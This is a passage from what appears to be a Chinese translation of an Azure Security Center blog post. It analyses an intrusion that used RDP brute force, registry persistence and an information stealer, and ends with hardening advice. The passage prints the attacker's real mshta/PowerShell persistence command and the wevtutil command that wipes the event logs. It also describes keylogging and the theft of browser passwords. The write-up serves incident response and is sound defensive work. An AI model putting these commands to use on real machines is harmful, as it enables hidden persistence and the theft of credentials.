pan style="color: #c95151;">"SophosMSHTA"="mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -c ""$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion SeCert).SeCert);powershell -E $x""",0,True)(window.close)"

• 註冊表的持久性能確保每次啟動或重啟時計算機時都會執行惡意指令。
• 註冊表 ASEP 啟動 Microsoft 腳本引擎（mshta.exe）。
• 反過來，Mshta.exe 運行 PowerShell.exe，然後讀取並解碼 HKLM SOFTWARE Microsoft Windows CurrentVersion - >“SeCert”的值。
• SeCert 的註冊表值告訴 PowerShel 從 'hxxp [：] // mdmservers [.] com' 下載並啟動惡意腳本。

惡意程式碼的下載與執行

一旦攻擊者設置了持久性機制並註銷，主機的下一次重啟就會啟動 PowerShell，從'hxxp [:] // mdmservers [.] com' 下載並啟動惡意的負載。 這個惡意腳本包含執行特定功能的各個部分。 下表詳細說明了惡意負載的主要功能：

操作

清除剪貼板中的內容並將輸出保存到以下位置：

％TEMP％ Applnsights_VisualStudio.txt

捕獲所有按鍵到以下位置：

％TEMP％ key.log

進行初始屏幕截圖並將.jpg保存到以下位置：

％TEMP％39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg

當鍵入某些財務或帳戶憑證相關關鍵字時，隨後進行屏幕截圖，並將.jpg保存到以下位置：

％TEMP％39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg

檢查是否安裝了Google Chrome瀏覽器。 如果是這樣，請收集Chrome緩存中的所有密碼並保存到以下位置：

％TEMP％ Chrome.log

檢查是否安裝了Mozilla Firefox瀏覽器。 如果是這樣，收集來自Firefox緩存的所有密碼並保存到以下位置：

％TEMP％ Firefox.log

總結來說

那麼，讓我們總結一下我們到現在為止在調查中看到的情況：

1. 當成功的 RDP Brute Force 攻擊中管理員帳戶遭到入侵時，會發生於初始入口。
2. 攻擊者然後執行一個 Base64 混淆的 PowerShell 指令，該命令設置在啟動時啟動的註冊表ASEP。
3. 然後，攻擊者通過使用以下命令刪除所有事件日誌來清除其活動的證據：wevtutil.exe -cl <eventlogname>。
4. 受影響的主機啟動或重啟時，它會在HKLM SOFTWARE Microsoft Windows CurrentVersion Run 中啟動惡意註冊表 ASEP
5. 註冊表 ASEP 啟動 Microsoft 腳本引擎（mshta.exe）。
6. 反過來，Mshta.exe 運行 PowerShell.exe，然後讀取並解碼 HKLM SOFTWARE Microsoft Windows CurrentVersion的值 - >“SeCert”
7. “SeCert” 的註冊表值告訴 PowerShell 從'hxxp [:] // mdmservers [.] com' 下載並啟動惡意腳本“
8. 然後，來自hxxp [:] // mdmservers [.] com的惡意代碼將執行以下操作：

• 將剪貼板中的內容剪切到：％temp％ Applnsights_VisualStudio.txt
• 截獲所有按鍵：％temp％ key.log
• 進行初始屏幕截圖並將 .jpg 保存到：％temp％ 39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg
• 在鍵入某些財務或帳戶憑證相關關鍵字時進行後續屏幕截圖，並將.jpg保存到以下位置：％temp％ 39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg
• 檢查是否安裝了Google Chrome 瀏覽器。 如果是，請收集 Chrome 緩存中的所有密碼並保存到：％temp％ Chrome.log
• 檢查是否安裝了Mozilla Firefox 瀏覽器。 如果是這樣，收集 Firefox 緩存中的所有密碼並保存到：％temp％ Firefox.log

這種攻擊的結果是來自一種信息竊取的惡意軟件，它從註冊表自動啟動，在內存中運行，並收集按鍵、瀏覽器密碼、剪貼板數據和截圖。

Azure Security Center 安全中心如何將它一網打盡

很明顯，攻擊者通過特殊手段隱藏了他們的活動;確保使用內置 Windows 可執行文件（PowerShell.exe，Mshta.exe，Wevtutil.exe）的所有進程執行，使用混淆並存儲在註冊表中的命令參數，以及刪除所有事件日誌以清除其跟踪。但是，這一努力並未阻止 Azure 安全中心檢測，收集和報告此惡意活動。

正如我們在本博客開始時所看到的，Azure 安全中心檢測到此攻擊的所有階段，提供了最初的RDP Brute Force 攻擊的詳細信息，並揭示了攻擊者發布的各個階段的所有命令。您還會在Alerts 中註意到，在攻擊的每個階段，所有混淆的命令行都被破譯，解碼並以明文顯示。這種寶貴且節省時間的信息有助於安全響應調查人員和系統管理員回答“發生了什麼？”、“這是什麼時候發生的？”、“他們是怎麼進來的？”、“他們進來時做了什麼？”、 “他們從哪裡來？”等問題。此外，調查人員還可以確定組織中的其他主機是否可能通過此受損主機的橫向移動而受到威脅。能夠看到這次攻擊的大局，也可以幫助回答動機問題，比如“他們之後要的是什麼？”在我們的案例中，主要目的似乎是憑藉竊取金錢或智力的目標。

在我們的所有調查中，Azure 安全中心在幫助確定關鍵細節（如初始入侵/入侵向量、攻擊源、可能的橫向移動以及攻擊範圍）方面發揮了關鍵作用。安全中心還詳細介紹了由於文件系統覆蓋或日誌保留/存儲限製而可能隨時間丟失的工件。 Azure 安全中心利用最新的機器學習和大數據分析功能，可以從各種來源獲取、存儲、分析和破譯數據，這對安全分析師、事件響應者和律師等專業人員都是非常寶貴的資源。

• 密碼策略：攻擊者通常使用廣泛可用的工具發動暴力攻擊，這些工具利用詞表和智能規則集智能地自動猜測用戶密碼。所以，第一步是確保為所有虛擬機使用複雜的密碼。一個複雜的密碼策略應該實施頻繁的密碼更改。詳細了解執行密碼策略的最佳做法。
• 端點：端點允許從互聯網與您的虛擬機進行通信。在 Azure 環境中創建虛擬機時，默認會創建兩個端點來幫助管理虛擬機，遠程桌面和 PowerShell。建議刪除不需要的任何端點，並只在需要時添加它們。如果您打開了端點，建議您盡可能更改使用的公共端口。創建新的 Windows VM 時，默認情況下遠程桌面的公共端口設置為“自動”，這意味著隨機公共端口將自動為您生成。在此獲取有關如何在 Azure 中的傳統 Windows 虛擬機上設置端點的更多信息。
• 啟用網絡安全組：Azure安全中心建議您啟用網絡安全組（NSG）（如果尚未啟用）。  NSG 包含訪問控制列表（ACL）規則的列表，允許或拒絕到虛擬網絡中的 VM 實例的網絡流量。端點 ACL 允許您控制要允許通過該管理協議訪問的地址的哪個 IP 地址或 CIDR 子網。了解有關如何使用網絡安全組過濾網絡流量以及在 Azure 安全中心中啟用網絡安全組的更多信息。
• 使用 VPN 進行管理：VPN 網關是一種虛擬網絡網關，通過公共連接將加密流量發送到本地位置。您還可以使用VPN網關通過Microsoft網絡在Azure虛擬網絡之間發送加密流量。要在您的Azure虛擬網絡和本地站點之間發送加密的網絡流量，您必須為您的虛擬網絡創建一個 VPN 網關。站點到站點和點對點站點網關連接允許我們完全刪除公共端點並通過安全VPN 連接直接連接到虛擬機。
• 網絡級身份驗證（NLA）：可以在主機上使用 NLA，以允許從域身份驗證用戶創建遠程桌面會話。由於 NLA 要求連接用戶在與服務器建立會話之前進行身份驗證，所以 Brute Force，Dictionary Attacks和密碼猜測攻擊可以得到緩解。
• 準時（JIT）網絡訪問：準時Azure安全中心中的虛擬機（VM）訪問可用於幫助保護和鎖定到Azure虛擬機的入站流量。 JIT網絡訪問可以通過限制端口打開的時間來減少暴力攻擊，從而減少攻擊風險，同時在需要時提供連接到虛擬機的簡便訪問。

其餘資源

PowerShell 團隊已經完成了大量工作，使 PowerShell 成為最安全、透明的腳本語言。以下鏈接詳細討論如何解決 PowerShell 問題：

• https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
• https://www.youtube.com/watch?v=ZkJ64_tQxPU
• https://twitter.com/Lee_Holmes/status/922462821081694208
• https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/

有關惡意腳本及其輸出的更多信息，請參見以下內容：

• 一個最有趣的PowerShell特洛伊木馬[@JohnLaTwC提供的PowerShell示例和Raw Paste數據]
• Windows Defender 惡意軟件百科全書條目：間諜軟件：PowerShell / Tripelog

了解有關 Azure 安全中心的更多信息，請參閱以下內容：

• Azure 安全中心的檢測功能
• 在 Azure 安全中心中管理和響應安全警報
• 管理 Azure 安全中心中的安全建議
• Azure 安全中心中的安全健康監控
• 使用 Azure 安全中心監控合作夥伴解決方案
• Azure 安全中心常見問題
• 通過閱讀 Azure 安全部落格獲取最新的 Azure 安全新聞和信息。